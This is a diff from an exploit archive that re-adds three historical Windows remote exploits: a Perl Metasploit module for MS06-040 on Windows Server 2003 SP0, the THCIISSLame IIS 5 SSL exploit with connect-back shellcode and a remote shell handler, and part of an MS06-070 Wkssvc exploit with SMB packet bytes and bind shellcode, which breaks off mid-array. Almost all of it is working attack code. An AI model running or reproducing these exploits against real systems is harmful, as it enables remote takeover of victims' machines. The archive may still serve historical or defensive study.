-	if ( length($dce->{'response'}->{'StubData'}) > 0) {
-		$self->PrintLine("[*] The server rejected it, trying again...");
-		@response = $dce->request( $handle, 0x1f, $stub );
-	}
-	
-	if ( length($dce->{'response'}->{'StubData'}) > 0) {
-		$self->PrintLine("[*] Exploit Failed");
-	}
-	
-	if (@response) {
-		$self->PrintLine('[*] RPC server responded with:');
-		foreach my $line (@response) {
-			$self->PrintLine( '[*] ' . $line );
-		}
-	}
-
-	return;
-}
-
-1;
-
-# milw0rm.com [2006-09-13]
+#########################################################################
+# netapi_win2003.pm (MS06-040 Exploit for Windows Server 2003 SP0)
+#
+# Author: Trirat Puttaraksa (Kira) <trir00t [at] gmail.com>
+#
+# http://sf-freedom.blogspot.com
+# 
+# For educational purpose only
+#
+# Note: This exploit is developed because of my question "Is it exploitable
+# on Windows Server 2003 platform ?". As I know, Windows XP SP2 and Windows
+# Server 2003 SP1 is not exploitable because they are compiled with /GS, but
+# how about Windows Server 2003 SP0 ? In metasploit netapi_ms06_040.pm there
+# is no Windows Server 2003 sp0 target, this means 2003 SP0 is not 
+# exploitable ? There is Stack Protection Windows Server 2003, is this the
+# reasons why there is no Windows Server 2003 SP0 exploit for MS06-040 ?
+#
+# I start to modify H D Moore's exploit (netapi_ms06_040.pm - credits to him
+# ^-^) and work on it. The problem is the Stack Protection "security cookie 
+# checking". Because wcscpy() method allow me to write to any memory location
+# that are marked writable, I decide to write to the location at "security
+# cookie" is stored and it works !!! I will describe more implementation details
+# in my blog in few days ^-^ 
+#
+# This exploit tested on Windows Server 2003 SP0 build 3790 and successful 
+# exploit 2003 machine in my environment - all patch before MS06-040 
+# (KB921883). It's quite reliable but not 100%. There is the possibility that
+# the exploit will fail and the target system process crash. Because I have 
+# only one testbase system, I couldn't confirm this exploit will work on 
+# your environment. However feel free to e-mail to me.
+#
+# Credits: H D Moore
+#########################################################################
+
+package Msf::Exploit::netapi_win2003;
+use base "Msf::Exploit";
+use strict;
+
+use Pex::DCERPC;
+use Pex::NDR;
+
+my $advanced = {
+	'FragSize'    => [ 256, 'The DCERPC fragment size' ],
+	'BindEvasion' => [ 0,   'IDS Evasion of the bind request' ],
+	'DirectSMB'   => [ 0,   'Use direct SMB (445/tcp)' ],
+  };
+
+my $info = {
+	'Name'    => 'MSO6-040 Windows Server 2003 Target',
+	'Version' => '',
+	'Authors' =>
+	  [
+		'Trirat Puttaraksa (Kira) <trir00t [at] gmail.com>',
+	  ],
+
+	'Arch' => ['x86'],
+	'OS'   => [ 'win32', 'win2003' ],
+	'Priv' => 1,
+
+	'AutoOpts' => { 'EXITFUNC' => 'thread' },
+	
+	'UserOpts' =>
+	  {
+		'RHOST' => [ 1, 'ADDR', 'The target address' ],
+
+		# SMB connection options
+		'SMBUSER' => [ 0, 'DATA', 'The SMB username to connect with', '' ],
+		'SMBPASS' => [ 0, 'DATA', 'The password for specified SMB username', '' ],
+		'SMBDOM'  => [ 0, 'DATA', 'The domain for specified SMB username', '' ],
+	  },
+
+	'Payload' =>
+	  {
+	  	# Technically we can use more space than this, but by limiting it
+		# to 370 bytes we can use the same request for all Windows SPs.
+		'Space'    => 370,
+		
+		'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
+		'Keys'     => ['+ws2ord'],
+
+		# sub esp, 4097 + inc esp makes stack happy
+		'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
+	  },
+
+	'Description' => Pex::Text::Freeform(
+		qq{
+		This exploit modified from netapi_ms06_040.pm (Metasploit).
+		While netapi_ms06_040 of metasploit works on Windows 2000 
+		SP0 - SP4 and Windows XP SP0 - SP1, this exploit works on
+		Windows Server 2003 SP0.
+	  }
+	  ),
+
+	'Refs' =>
+	  [
+		[ 'BID', '19409' ],
+		[ 'CVE', '2006-3439' ],
+		[ 'MSB', 'MS06-040' ],
+	  ],
+
+	'DefaultTarget' => 0,
+	'Targets'       =>
+	  [
+		[ '(wcscpy) Windows Server 2003 SP0', 612],
+	  ],
+
+	'Keys' => ['srvsvc'],
+
+	'DisclosureDate' => '',
+  };
+
+sub new {
+	my ($class) = @_;
+	my $self =
+	  $class->SUPER::new( { 'Info' => $info, 'Advanced' => $advanced }, @_ );
+	return ($self);
+}
+
+sub Exploit {
+	my ($self)      = @_;
+	my $target_host = $self->GetVar('RHOST');
+	my $target_port = $self->GetVar('RPORT');
+	my $target_idx  = $self->GetVar('TARGET');
+	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
+	my $target_name = '*SMBSERVER';
+
+	my $FragSize = $self->GetVar('FragSize') || 256;
+	my $target   = $self->Targets->[$target_idx];
+
+	if (!$self->InitNops(128)) {
+		$self->PrintLine("Could not initialize the nop module");
+		return;
+	}
+
+	my ( $res, $rpc );
+
+	my $pipe    = '\BROWSER';
+	my $uuid    = '4b324fc8-1670-01d3-1278-5a47bf6ee188';
+	my $version = '3.0';
+
+	my $handle = Pex::DCERPC::build_handle( $uuid, $version, 'ncacn_np', $target_host, $pipe );
+
+	my $dce = Pex::DCERPC->new(
+		'handle'      => $handle,
+		'username'    => $self->GetVar('SMBUSER'),
+		'password'    => $self->GetVar('SMBPASS'),
+		'domain'      => $self->GetVar('SMBDOM'),
+		'fragsize'    => $self->GetVar('FragSize'),
+		'bindevasion' => $self->GetVar('BindEvasion'),
+		'directsmb'   => $self->GetVar('DirectSMB'),
+	  );
+
+	if ( !$dce ) {
+		$self->PrintLine("[*] Could not bind to $handle");
+		return;
+	}
+
+	my $smb = $dce->{'_handles'}{$handle}{'connection'};
+	
+	if (! $smb) {
+		$self->PrintLine("[*] Could not establish SMB session");
+		return;
+	}
+
+	my $stub;
+
+	#
+	# Use the wcscpy() method on Windows Server 2003 SP0
+	#	
+	if ($target->[0] =~ /2003/) {
+
+		my $path = 	
+			$shellcode.
+
+			# Padding
+			Pex::Text::AlphaNumText($target->[1] - length($shellcode)).
+			Pex::Text::AlphaNumText(32).
+			substr($shellcode, 0, 4).	# cookie
+			Pex::Text::AlphaNumText(4).
+			# return address == address that store security cookie
+			("\xec\xc1\xc8\x71") . 
+			Pex::Text::AlphaNumText(8).
+
+			("\xec\xc1\xc8\x71" x 2) .
+			Pex::Text::AlphaNumText(36).
+
+			# Terminate
+			"\x00\x00";
+
+
+		# Package that into a stub
+		$stub =
+			Pex::NDR::Long(int(rand(0xffffffff))).
+			Pex::NDR::UnicodeConformantVaryingString('').
+			Pex::NDR::UnicodeConformantVaryingStringPreBuilt($path).
+			Pex::NDR::Long(int(rand(250)+1)).
+			Pex::NDR::UnicodeConformantVaryingString('').
+			Pex::NDR::Long(int(rand(250)+1)).
+			Pex::NDR::Long(0);
+	}
+	else {
+		$self->PrintLine("This target is not currently supported");
+		return;
+	}
+
+
+	$self->PrintLine("[*] Sending request...");
+	
+	# Function 0x1f is not the only way to exploit this :-)
+	my @response = $dce->request( $handle, 0x1f, $stub );
+	
+	if ( length($dce->{'response'}->{'StubData'}) > 0) {
+		$self->PrintLine("[*] The server rejected it, trying again...");
+		@response = $dce->request( $handle, 0x1f, $stub );
+	}
+	
+	if ( length($dce->{'response'}->{'StubData'}) > 0) {
+		$self->PrintLine("[*] Exploit Failed");
+	}
+	
+	if (@response) {
+		$self->PrintLine('[*] RPC server responded with:');
+		foreach my $line (@response) {
+			$self->PrintLine( '[*] ' . $line );
+		}
+	}
+
+	return;
+}
+
+1;
+
+# milw0rm.com [2006-09-13]

platforms/windows/remote/275.c

@@ -1,255 +1,255 @@
-/*****************************************************************************/
-/* THCIISSLame 0.3 - IIS 5 SSL remote root exploit                           */
-/* Exploit by: Johnny Cyberpunk (jcyberpunk@thc.org)                         */
-/* THC PUBLIC SOURCE MATERIALS                                               */
-/*                                                                           */
-/* Bug was found by Internet Security Systems                                */
-/* Reversing credits of the bug go to Halvar Flake                           */
-/*                                                                           */
-/* compile with MS Visual C++ : cl THCIISSLame.c                             */
-/*                                                                           */
-/* v0.3 - removed sleep[500]; and fixed the problem with zero ips/ports      */
-/* v0.2 - This little update uses a connectback shell !                      */
-/* v0.1 - First release with portbinding shell on 31337                      */
-/*                                                                           */
-/* At least some greetz fly to : THC, Halvar Flake, FX, gera, MaXX, dvorak,  */
-/* scut, stealth, FtR and Random                                             */
-/*****************************************************************************/
-
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <winsock2.h>
-
-#pragma comment(lib, "ws2_32.lib")
-
-#define jumper    "\xeb\x0f"
-#define greetings_to_microsoft "\x54\x48\x43\x4f\x57\x4e\x5a\x49\x49\x53\x21"
-
-char sslshit[] = "\x80\x62\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x82\x01\x00\x00\x00";
-
-char shellcode[] =
-"\xeb\x25\xe9\xfa\x99\xd3\x77\xf6\x02\x06\x6c\x59\x6c\x59\xf8"
-"\x1d\x9c\xde\x8c\xd1\x4c\x70\xd4\x03\x58\x46\x57\x53\x32\x5f"
-"\x33\x32\x2e\x44\x4c\x4c\x01\xeb\x05\xe8\xf9\xff\xff\xff\x5d"
-"\x83\xed\x2c\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c"
-"\xad\x8b\x78\x08\x8d\x5f\x3c\x8b\x1b\x01\xfb\x8b\x5b\x78\x01"
-"\xfb\x8b\x4b\x1c\x01\xf9\x8b\x53\x24\x01\xfa\x53\x51\x52\x8b"
-"\x5b\x20\x01\xfb\x31\xc9\x41\x31\xc0\x99\x8b\x34\x8b\x01\xfe"
-"\xac\x31\xc2\xd1\xe2\x84\xc0\x75\xf7\x0f\xb6\x45\x09\x8d\x44"
-"\x45\x08\x66\x39\x10\x75\xe1\x66\x31\x10\x5a\x58\x5e\x56\x50"
-"\x52\x2b\x4e\x10\x41\x0f\xb7\x0c\x4a\x8b\x04\x88\x01\xf8\x0f"
-"\xb6\x4d\x09\x89\x44\x8d\xd8\xfe\x4d\x09\x75\xbe\xfe\x4d\x08"
-"\x74\x17\xfe\x4d\x24\x8d\x5d\x1a\x53\xff\xd0\x89\xc7\x6a\x02"
-"\x58\x88\x45\x09\x80\x45\x79\x0c\xeb\x82\x50\x8b\x45\x04\x35"
-"\x93\x93\x93\x93\x89\x45\x04\x66\x8b\x45\x02\x66\x35\x93\x93"
-"\x66\x89\x45\x02\x58\x89\xce\x31\xdb\x53\x53\x53\x53\x56\x46"
-"\x56\xff\xd0\x89\xc7\x55\x58\x66\x89\x30\x6a\x10\x55\x57\xff"
-"\x55\xe0\x8d\x45\x88\x50\xff\x55\xe8\x55\x55\xff\x55\xec\x8d"
-"\x44\x05\x0c\x94\x53\x68\x2e\x65\x78\x65\x68\x5c\x63\x6d\x64"
-"\x94\x31\xd2\x8d\x45\xcc\x94\x57\x57\x57\x53\x53\xfe\xca\x01"
-"\xf2\x52\x94\x8d\x45\x78\x50\x8d\x45\x88\x50\xb1\x08\x53\x53"
-"\x6a\x10\xfe\xce\x52\x53\x53\x53\x55\xff\x55\xf0\x6a\xff\xff"
-"\x55\xe4";
-
-void usage();
-void shell(int sock);
-
-int main(int argc, char *argv[])
-{  
-  unsigned int i,sock,sock2,sock3,addr,rc,len=16;
-  unsigned char *badbuf,*p;
-  unsigned long offset = 0x6741a1cd;
-  unsigned long XOR = 0xffffffff;
-  unsigned long XORIP = 0x93939393;
-  unsigned short XORPORT = 0x9393;
-
-  unsigned short cbport;
-  unsigned long  cbip;
-
-  struct sockaddr_in mytcp;
-  struct hostent * hp;
-  WSADATA wsaData;
-
-  printf("\nTHCIISSLame v0.3 - IIS 5.0 SSL remote root exploit\n");
-  printf("tested on Windows 2000 Server german/english SP4\n");
-  printf("by Johnny Cyberpunk (jcyberpunk@thc.org)\n");
-
-  if(argc<4 || argc>4)
-   usage();
-
-  badbuf = malloc(352);
-  memset(badbuf,0,352);
-
-  printf("\n[*] building buffer\n");
-
-  p = badbuf;
-
-  memcpy(p,sslshit,sizeof(sslshit));
-
-  p+=sizeof(sslshit)-1;
-  
-  strcat(p,jumper);
-
-  strcat(p,greetings_to_microsoft);
-
-  offset^=XOR;
-  strncat(p,(unsigned char *)&offset,4);
-
-  cbport = htons((unsigned short)atoi(argv[3]));
-  cbip = inet_addr(argv[2]);
-  cbport ^= XORPORT;
-  cbip ^= XORIP;
-  memcpy(&shellcode[2],&cbport,2);
-  memcpy(&shellcode[4],&cbip,4);
-
-  strcat(p,shellcode);
-  
-  if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
-  {
-   printf("WSAStartup failed !\n");
-   exit(-1);
-  }
-  
-  hp = gethostbyname(argv[1]);
-
-  if (!hp){
-   addr = inet_addr(argv[1]);
-  }
-  if ((!hp)  && (addr == INADDR_NONE) )
-  {
-   printf("Unable to resolve %s\n",argv[1]);
-   exit(-1);
-  }
-
-  sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
-  if (!sock)
-  { 
-   printf("socket() error...\n");
-   exit(-1);
-  }
-  
-  if (hp != NULL)
-   memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length);
-  else
-   mytcp.sin_addr.s_addr = addr;
-
-  if (hp)
-   mytcp.sin_family = hp->h_addrtype;
-  else
-   mytcp.sin_family = AF_INET;
-
-  mytcp.sin_port=htons(443);
-
-  printf("[*] connecting the target\n");
-
-  rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in));
-  if(rc==0)
-  {
-      send(sock,badbuf,351,0);
-      printf("[*] exploit send\n");
-  
-      mytcp.sin_addr.s_addr = 0;
-      mytcp.sin_port=htons((unsigned short)atoi(argv[3]));
-
-      sock2=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
-      
-      rc=bind(sock2,(struct sockaddr *)&mytcp,16);
-      if(rc!=0)
-      {
-       printf("bind error() %d\n",WSAGetLastError());
-       exit(-1);
-      }
-   
-      rc=listen(sock2,1);
-      if(rc!=0)
-      {
-       printf("listen error()\n");
-       exit(-1);
-      }
-
-      printf("[*] waiting for shell\n");
-      sock3 = accept(sock2, (struct sockaddr*)&mytcp,&len); 
-      if(sock3)
-      { 
-       printf("[*] Exploit successful ! Have fun !\n");
-       printf("[*] --------------------------------------------------------------------\n\n");
-       shell(sock3);
-      }
-  }
-  else
-  {
-   printf("\nCan't connect to ssl port 443!\n");
-   exit(-1);
-  }
-  
-  shutdown(sock,1);
-  closesocket(sock);
-  shutdown(sock,2);
-  closesocket(sock2);
-  shutdown(sock,3);
-  closesocket(sock3);
-
-  free(badbuf);
-
-  exit(0);
-}
- 
-void usage()
-{
- unsigned int a;
- printf("\nUsage:  <victim-host> <connectback-ip> <connectback port>\n");
- printf("Sample: THCIISSLame www.lameiss.com 31.33.7.23 31337\n\n");
- exit(0);
-}
-
-void shell(int sock)
-{
- int l;
- char buf[1024];
- struct timeval time;
- unsigned long ul[2];
-
- time.tv_sec = 1;
- time.tv_usec = 0;
-
- while (1)
- {
-  ul[0] = 1;
-  ul[1] = sock;
-
-  l = select (0, (fd_set *)&ul, NULL, NULL, &time);
-  if(l == 1)
-  {  	
-   l = recv (sock, buf, sizeof (buf), 0);
-   if (l <= 0)
-   {
-    printf ("bye bye...\n");
-    return;
-   }
-  l = write (1, buf, l);
-   if (l <= 0)
-   {
-    printf ("bye bye...\n");
-    return;
-   }
-  }
-  else
-  {
-   l = read (0, buf, sizeof (buf));
-   if (l <= 0)
-   {
-    printf("bye bye...\n");
-    return;
-   }
-   l = send(sock, buf, l, 0);
-   if (l <= 0)
-   {
-    printf("bye bye...\n");
-    return;
-   }
-  }
- }
-}
-
-// milw0rm.com [2004-04-21]
+/*****************************************************************************/
+/* THCIISSLame 0.3 - IIS 5 SSL remote root exploit                           */
+/* Exploit by: Johnny Cyberpunk (jcyberpunk@thc.org)                         */
+/* THC PUBLIC SOURCE MATERIALS                                               */
+/*                                                                           */
+/* Bug was found by Internet Security Systems                                */
+/* Reversing credits of the bug go to Halvar Flake                           */
+/*                                                                           */
+/* compile with MS Visual C++ : cl THCIISSLame.c                             */
+/*                                                                           */
+/* v0.3 - removed sleep[500]; and fixed the problem with zero ips/ports      */
+/* v0.2 - This little update uses a connectback shell !                      */
+/* v0.1 - First release with portbinding shell on 31337                      */
+/*                                                                           */
+/* At least some greetz fly to : THC, Halvar Flake, FX, gera, MaXX, dvorak,  */
+/* scut, stealth, FtR and Random                                             */
+/*****************************************************************************/
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <winsock2.h>
+
+#pragma comment(lib, "ws2_32.lib")
+
+#define jumper    "\xeb\x0f"
+#define greetings_to_microsoft "\x54\x48\x43\x4f\x57\x4e\x5a\x49\x49\x53\x21"
+
+char sslshit[] = "\x80\x62\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x82\x01\x00\x00\x00";
+
+char shellcode[] =
+"\xeb\x25\xe9\xfa\x99\xd3\x77\xf6\x02\x06\x6c\x59\x6c\x59\xf8"
+"\x1d\x9c\xde\x8c\xd1\x4c\x70\xd4\x03\x58\x46\x57\x53\x32\x5f"
+"\x33\x32\x2e\x44\x4c\x4c\x01\xeb\x05\xe8\xf9\xff\xff\xff\x5d"
+"\x83\xed\x2c\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c"
+"\xad\x8b\x78\x08\x8d\x5f\x3c\x8b\x1b\x01\xfb\x8b\x5b\x78\x01"
+"\xfb\x8b\x4b\x1c\x01\xf9\x8b\x53\x24\x01\xfa\x53\x51\x52\x8b"
+"\x5b\x20\x01\xfb\x31\xc9\x41\x31\xc0\x99\x8b\x34\x8b\x01\xfe"
+"\xac\x31\xc2\xd1\xe2\x84\xc0\x75\xf7\x0f\xb6\x45\x09\x8d\x44"
+"\x45\x08\x66\x39\x10\x75\xe1\x66\x31\x10\x5a\x58\x5e\x56\x50"
+"\x52\x2b\x4e\x10\x41\x0f\xb7\x0c\x4a\x8b\x04\x88\x01\xf8\x0f"
+"\xb6\x4d\x09\x89\x44\x8d\xd8\xfe\x4d\x09\x75\xbe\xfe\x4d\x08"
+"\x74\x17\xfe\x4d\x24\x8d\x5d\x1a\x53\xff\xd0\x89\xc7\x6a\x02"
+"\x58\x88\x45\x09\x80\x45\x79\x0c\xeb\x82\x50\x8b\x45\x04\x35"
+"\x93\x93\x93\x93\x89\x45\x04\x66\x8b\x45\x02\x66\x35\x93\x93"
+"\x66\x89\x45\x02\x58\x89\xce\x31\xdb\x53\x53\x53\x53\x56\x46"
+"\x56\xff\xd0\x89\xc7\x55\x58\x66\x89\x30\x6a\x10\x55\x57\xff"
+"\x55\xe0\x8d\x45\x88\x50\xff\x55\xe8\x55\x55\xff\x55\xec\x8d"
+"\x44\x05\x0c\x94\x53\x68\x2e\x65\x78\x65\x68\x5c\x63\x6d\x64"
+"\x94\x31\xd2\x8d\x45\xcc\x94\x57\x57\x57\x53\x53\xfe\xca\x01"
+"\xf2\x52\x94\x8d\x45\x78\x50\x8d\x45\x88\x50\xb1\x08\x53\x53"
+"\x6a\x10\xfe\xce\x52\x53\x53\x53\x55\xff\x55\xf0\x6a\xff\xff"
+"\x55\xe4";
+
+void usage();
+void shell(int sock);
+
+int main(int argc, char *argv[])
+{  
+  unsigned int i,sock,sock2,sock3,addr,rc,len=16;
+  unsigned char *badbuf,*p;
+  unsigned long offset = 0x6741a1cd;
+  unsigned long XOR = 0xffffffff;
+  unsigned long XORIP = 0x93939393;
+  unsigned short XORPORT = 0x9393;
+
+  unsigned short cbport;
+  unsigned long  cbip;
+
+  struct sockaddr_in mytcp;
+  struct hostent * hp;
+  WSADATA wsaData;
+
+  printf("\nTHCIISSLame v0.3 - IIS 5.0 SSL remote root exploit\n");
+  printf("tested on Windows 2000 Server german/english SP4\n");
+  printf("by Johnny Cyberpunk (jcyberpunk@thc.org)\n");
+
+  if(argc<4 || argc>4)
+   usage();
+
+  badbuf = malloc(352);
+  memset(badbuf,0,352);
+
+  printf("\n[*] building buffer\n");
+
+  p = badbuf;
+
+  memcpy(p,sslshit,sizeof(sslshit));
+
+  p+=sizeof(sslshit)-1;
+  
+  strcat(p,jumper);
+
+  strcat(p,greetings_to_microsoft);
+
+  offset^=XOR;
+  strncat(p,(unsigned char *)&offset,4);
+
+  cbport = htons((unsigned short)atoi(argv[3]));
+  cbip = inet_addr(argv[2]);
+  cbport ^= XORPORT;
+  cbip ^= XORIP;
+  memcpy(&shellcode[2],&cbport,2);
+  memcpy(&shellcode[4],&cbip,4);
+
+  strcat(p,shellcode);
+  
+  if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
+  {
+   printf("WSAStartup failed !\n");
+   exit(-1);
+  }
+  
+  hp = gethostbyname(argv[1]);
+
+  if (!hp){
+   addr = inet_addr(argv[1]);
+  }
+  if ((!hp)  && (addr == INADDR_NONE) )
+  {
+   printf("Unable to resolve %s\n",argv[1]);
+   exit(-1);
+  }
+
+  sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
+  if (!sock)
+  { 
+   printf("socket() error...\n");
+   exit(-1);
+  }
+  
+  if (hp != NULL)
+   memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length);
+  else
+   mytcp.sin_addr.s_addr = addr;
+
+  if (hp)
+   mytcp.sin_family = hp->h_addrtype;
+  else
+   mytcp.sin_family = AF_INET;
+
+  mytcp.sin_port=htons(443);
+
+  printf("[*] connecting the target\n");
+
+  rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in));
+  if(rc==0)
+  {
+      send(sock,badbuf,351,0);
+      printf("[*] exploit send\n");
+  
+      mytcp.sin_addr.s_addr = 0;
+      mytcp.sin_port=htons((unsigned short)atoi(argv[3]));
+
+      sock2=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
+      
+      rc=bind(sock2,(struct sockaddr *)&mytcp,16);
+      if(rc!=0)
+      {
+       printf("bind error() %d\n",WSAGetLastError());
+       exit(-1);
+      }
+   
+      rc=listen(sock2,1);
+      if(rc!=0)
+      {
+       printf("listen error()\n");
+       exit(-1);
+      }
+
+      printf("[*] waiting for shell\n");
+      sock3 = accept(sock2, (struct sockaddr*)&mytcp,&len); 
+      if(sock3)
+      { 
+       printf("[*] Exploit successful ! Have fun !\n");
+       printf("[*] --------------------------------------------------------------------\n\n");
+       shell(sock3);
+      }
+  }
+  else
+  {
+   printf("\nCan't connect to ssl port 443!\n");
+   exit(-1);
+  }
+  
+  shutdown(sock,1);
+  closesocket(sock);
+  shutdown(sock,2);
+  closesocket(sock2);
+  shutdown(sock,3);
+  closesocket(sock3);
+
+  free(badbuf);
+
+  exit(0);
+}
+ 
+void usage()
+{
+ unsigned int a;
+ printf("\nUsage:  <victim-host> <connectback-ip> <connectback port>\n");
+ printf("Sample: THCIISSLame www.lameiss.com 31.33.7.23 31337\n\n");
+ exit(0);
+}
+
+void shell(int sock)
+{
+ int l;
+ char buf[1024];
+ struct timeval time;
+ unsigned long ul[2];
+
+ time.tv_sec = 1;
+ time.tv_usec = 0;
+
+ while (1)
+ {
+  ul[0] = 1;
+  ul[1] = sock;
+
+  l = select (0, (fd_set *)&ul, NULL, NULL, &time);
+  if(l == 1)
+  {  	
+   l = recv (sock, buf, sizeof (buf), 0);
+   if (l <= 0)
+   {
+    printf ("bye bye...\n");
+    return;
+   }
+  l = write (1, buf, l);
+   if (l <= 0)
+   {
+    printf ("bye bye...\n");
+    return;
+   }
+  }
+  else
+  {
+   l = read (0, buf, sizeof (buf));
+   if (l <= 0)
+   {
+    printf("bye bye...\n");
+    return;
+   }
+   l = send(sock, buf, l, 0);
+   if (l <= 0)
+   {
+    printf("bye bye...\n");
+    return;
+   }
+  }
+ }
+}
+
+// milw0rm.com [2004-04-21]

platforms/windows/remote/2789.cpp

@@ -1,421 +1,421 @@
-/***************************************************************************
-
-Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploit
-
-by cocoruder(frankruder_at_hotmail.com),2006.11.15
-page:http://ruder.cdut.net/default.asp
-
-successfully test on Windows 2000 Server SP4(chinese)
-
-usage:
-ms06070 targetip DomainName
-
-notice:
-Make sure the DomainName is valid and live,more informations see
-http://research.eeye.com/html/advisories/published/AD20061114.html,
-cocoruder just research the vulnerability and give the exploit for
-Win2000.
-****************************************************************************/
-
-
-#include <stdio.h>
-#include <windows.h>
-#include <winsock.h>
-#include <tchar.h>
-
-
-unsigned char SmbNeg[] =
-"\x00\x00\x00\x2f\xff\x53\x4d\x42\x72\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x88\x05\x00\x00\x00\x00\x00\x0c\x00\x02\x4e\x54"
-"\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00";
-
-
-unsigned char Session_Setup_AndX_Request[]=
-"\x00\x00\x00\x48\xff\x53\x4d\x42\x73\x00"
-"\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\xff\xff\x88\x05\x00\x00\x00\x00\x0d\xff\x00\x00\x00\xff"
-"\xff\x02\x00\x88\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x01\x00\x00\x00\x0b\x00\x00\x00\x6e\x74\x00\x70\x79\x73\x6d"
-"\x62\x00";
-
-
-unsigned char TreeConnect_AndX_Request[]=
-"\x00\x00\x00\x58\xff\x53\x4d\x42\x75\x00"
-"\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\xff\xfe\x00\x08\x00\x03\x04\xff\x00\x58\x00\x08"
-"\x00\x01\x00\x2d\x00\x00\x5c\x00\x5c\x00\x31\x00\x37\x00\x32\x00"
-"\x2e\x00\x32\x00\x32\x00\x2e\x00\x35\x00\x2e\x00\x34\x00\x36\x00"
-"\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00\x3f\x3f\x3f\x3f"
-"\x3f\x00";
-
-
-unsigned char NTCreate_AndX_Request[]=
-"\x00\x00\x00\x64\xff\x53\x4d\x42\xa2\x00"
-"\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x08\x04\x0c\x00\x08\x00\x01\x18\xff\x00\xde\xde\x00"
-"\x0e\x00\x16\x00\x00\x00\x00\x00\x00\x00\x9f\x01\x02\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x01\x00"
-"\x00\x00\x40\x00\x40\x00\x02\x00\x00\x00\x01\x11\x00\x00\x5c\x00"
-"\x77\x00\x6b\x00\x73\x00\x73\x00\x76\x00\x63\x00\x00\x00";
-
-
-unsigned char Rpc_Bind_Wkssvc[]=
-"\x00\x00\x00\x92\xff\x53\x4d\x42\x25\x00"
-"\x00\x00\x00\x18\x01\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x01\x08\xf0\x0b\x03\x08\xf7\x4c\x10\x00\x00\x48\x00\x00"
-"\x04\xe0\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4a"
-"\x00\x48\x00\x4a\x00\x02\x00\x26\x00\x01\x40\x4f\x00\x5c\x50\x49"
-"\x50\x45\x5c\x00\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00"
-"\x00\x00\x00\x00\xd0\x16\xd0\x16\x00\x00\x00\x00\x01\x00\x00\x00"
-"\x00\x00\x01\x00\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x46\xc3"
-"\xf8\x7e\x34\x5a\x01\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11"
-"\x9f\xe8\x08\x00\x2b\x10\x48\x60\x02\x00\x00\x00";
-
-
-unsigned char Rpc_NetrJoinDomain2_Header[]=
-"\x00\x00\x00\xa8\xff\x53\x4d\x42\x25\x00"
-"\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x08\x6c\x07\x00\x08\xc0\x01\x10\x00\x00\x54\x00\x00"
-"\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54"
-"\x00\x54\x00\x54\x00\x02\x00\x26\x00\x00\x40\x65\x00\x00\x5c\x00"
-"\x50\x00\x49\x00\x50\x00\x45\x00\x5c\x00\x00\x00\x00\x00\x05\x00"
-"\x00\x03\x10\x00\x00\x00\x54\x00\x00\x00\x01\x00\x00\x00\x3c\x00"
-"\x00\x00\x00\x00"
-"\x16\x00"     //opnum,NetrJoinDomain2
-"\x30\x2a\x42\x00"
-"\x0e\x00\x00\x00"
-"\x00\x00\x00\x00"
-"\x0e\x00\x00\x00"
-"\x5c\x00\x5c\x00\x31\x00\x37\x00\x32\x00"
-"\x2e\x00\x32\x00\x32\x00\x2e\x00\x35\x00\x2e\x00\x34\x00\x31\x00"
-"\x00\x00"
-"\x10\x01\x00\x00"
-"\x00\x00\x00\x00"
-"\x10\x01\x00\x00";
-
-
-unsigned char Rpc_NetrJoinDomain2_End[]=
-"\x00\x00\x00\x00"
-"\x00\x00\x00\x00"
-"\x00\x00\x00\x00"
-"\x01\x00\x00\x00";
-
-
-unsigned char *lpDomainName=NULL;
-DWORD   dwDomainNameLen=0;
-
-
-
-/* win32_bind -  EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub
-http://metasploit.com */
-unsigned char shellcode[] =
-"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6e"
-"\xd2\x50\xd3\x83\xeb\xfc\xe2\xf4\x92\xb8\xbb\x9e\x86\x2b\xaf\x2c"
